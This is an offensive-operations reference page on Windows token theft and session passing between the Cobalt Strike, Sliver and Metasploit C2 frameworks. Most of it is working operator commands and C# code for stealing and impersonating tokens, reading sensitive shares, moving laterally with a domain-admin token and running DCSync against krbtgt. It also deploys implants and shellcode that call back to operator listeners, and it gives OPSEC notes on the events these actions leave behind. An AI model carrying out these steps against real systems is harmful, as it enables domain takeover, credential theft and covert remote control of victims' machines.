Token Operations & Session Passing
Managing Windows access tokens within C2 and passing sessions between frameworks. Tokens represent a user’s security context — stealing or creating them allows acting as another user without knowing their password.
Token Operations
Understanding Tokens
Every process and thread has an access token containing:
- User SID and group memberships
- Privileges (SeDebugPrivilege, SeImpersonatePrivilege, etc.)
- Integrity level (Low, Medium, High, SYSTEM)
Primary token — assigned to a process at creation. Impersonation token — temporary identity a thread can assume. Beacon uses impersonation tokens for most credential-based operations.
CS: Token Commands
steal_token
Duplicates the access token from a running process. The current Beacon thread impersonates that user for all subsequent actions.
# 1. List processes and find target user's process
beacon> ps
# 2. Steal their token
beacon> steal_token <PID>
# 3. Verify
beacon> getuid
# [*] You are DOMAIN\targetuser
# 4. Perform actions as that user
beacon> ls \\server\share
beacon> shell dir \\dc01\c$
# 5. Drop the impersonation token
beacon> rev2self
beacon> getuid
# [*] You are DOMAIN\originaluserImportant
steal_tokenrequires the Beacon to haveSeDebugPrivilegeor sufficient access to open a handle to the target process. Elevated beacons (SYSTEM/admin) can steal from any process.
make_token
Creates a new logon session with explicit credentials. The token is a network logon (type 9) — it works for remote access (SMB, WinRM, LDAP) but does not change the local identity.
# Create token with plaintext credentials
beacon> make_token DOMAIN\user Password123!
# Verify — getuid still shows original user (local identity unchanged)
beacon> getuid
# [*] You are DOMAIN\originaluser
# But network access uses the new credentials
beacon> ls \\server\c$
# [*] Listing: \\server\c$ (as DOMAIN\user)
# Drop the token
beacon> rev2self
make_tokenis the cleanest way to use credentials — no process injection, no LSASS access. Just creates a logon session.
getuid
Check current security context.
beacon> getuid
# [*] You are DOMAIN\user (shows current impersonated identity)rev2self
Revert to the Beacon’s original token. Always use after steal_token or make_token.
beacon> rev2selfToken Store (CS 4.8+)
Manage multiple stolen tokens without re-stealing.
# Steal and store
beacon> token-store steal <PID>
# List stored tokens
beacon> token-store show
# Use a stored token by index
beacon> token-store use <index>
# Remove a stored token
beacon> token-store remove <index>
# Remove all
beacon> token-store remove-allSliver: Token Operations
# Impersonate — steal token from PID
sliver> impersonate -p <PID>
# Make token (logon type 9)
sliver> make-token -u <user> -d <domain> -p <password>
# Revert
sliver> rev2self
# Check current user
sliver> whoami
sliver> sa-whoami # detailed with privileges
# Get SYSTEM (from admin)
sliver> getsystemManual: Token Impersonation
// C# token theft (requires SeDebugPrivilege)
IntPtr hProcess = OpenProcess(PROCESS_QUERY_INFORMATION, false, pid);
OpenProcessToken(hProcess, TOKEN_DUPLICATE | TOKEN_IMPERSONATE, out IntPtr hToken);
DuplicateTokenEx(hToken, TOKEN_ALL_ACCESS, IntPtr.Zero, SECURITY_IMPERSONATION, TOKEN_PRIMARY, out IntPtr newToken);
ImpersonateLoggedOnUser(newToken);
// Current thread now runs as the stolen identityCommon Token Workflows
Access a File Share as Another User
beacon> make_token DOMAIN\fileadmin Password123!
beacon> ls \\fileserver\sensitive$
beacon> download \\fileserver\sensitive$\data.xlsx
beacon> rev2selfLateral Movement with Stolen Token
beacon> steal_token <PID> # steal DA token
beacon> jump winrm64 dc01 smb
beacon> rev2selfDCSync with Token
beacon> steal_token <PID> # steal DA or replication rights user
beacon> dcsync DOMAIN\krbtgt
beacon> rev2selfSession Passing
CS → CS (Spawn)
Spawn a new Beacon linked to a different listener.
# Spawn a new Beacon using a different listener (e.g. switch from HTTP to SMB)
beacon> spawn x64 smb-listener
# Spawn as another user
beacon> spawnas DOMAIN\user Password123! http-listenerCS → Metasploit (Foreign Listener)
Pass a Beacon session to Metasploit for modules not available in CS.
# 1. In Metasploit — start a handler
msf> use exploit/multi/handler
msf> set payload windows/meterpreter/reverse_http
msf> set LHOST <msf_ip>
msf> set LPORT 8443
msf> exploit -j
# 2. In CS — create a Foreign HTTP listener
# Cobalt Strike > Listeners > Add
# Payload: Foreign HTTP
# Host: <msf_ip>
# Port: 8443
# 3. Spawn a session to the foreign listener
beacon> spawn x64 msf-httpMetasploit → CS
# 1. In CS — start an HTTP/HTTPS listener
# 2. Generate CS shellcode
# Attacks > Packages > Windows Executable (Stageless)
# Output: Raw (.bin)
# 3. In Metasploit — inject CS shellcode
msf> use post/windows/manage/shellcode_inject
msf> set SHELLCODE /path/to/beacon.bin
msf> set SESSION <meterpreter_session_id>
msf> runCS → Sliver
# 1. In Sliver — generate a stageless implant
sliver> generate --mtls <sliver_ip> -s /tmp/sliver-implant.exe
# 2. From CS — upload and execute
beacon> cd C:\Users\Public
beacon> upload /tmp/sliver-implant.exe
beacon> run C:\Users\Public\sliver-implant.exe
# Or inject Sliver shellcode
# 1. Generate shellcode in Sliver
sliver> generate --mtls <sliver_ip> -f shellcode -s /tmp/sliver.bin
# 2. Inject in CS
beacon> shinject <PID> x64 /tmp/sliver.binSliver → CS
# 1. Generate CS stageless shellcode (.bin)
# 2. From Sliver — inject
sliver> execute-shellcode -p <PID> /path/to/beacon.binNote
OPSEC summary:
steal_token: opens handle to target process — Event 4656/Sysmon Event 10make_token: creates logon type 9 — Event 4624 (but common in enterprise)rev2self: no detection surface — purely local operation- Foreign listeners (CS → MSF): Meterpreter traffic has a different detection profile than Beacon
- Cross-framework injection: shellcode injection events (CreateRemoteThread) apply regardless of framework
See also: b. User and Session Impersonation (PTH, Over-PTH, PTT), b. Process Injection (injection techniques), e. Credential Dumping (obtaining credentials for make_token)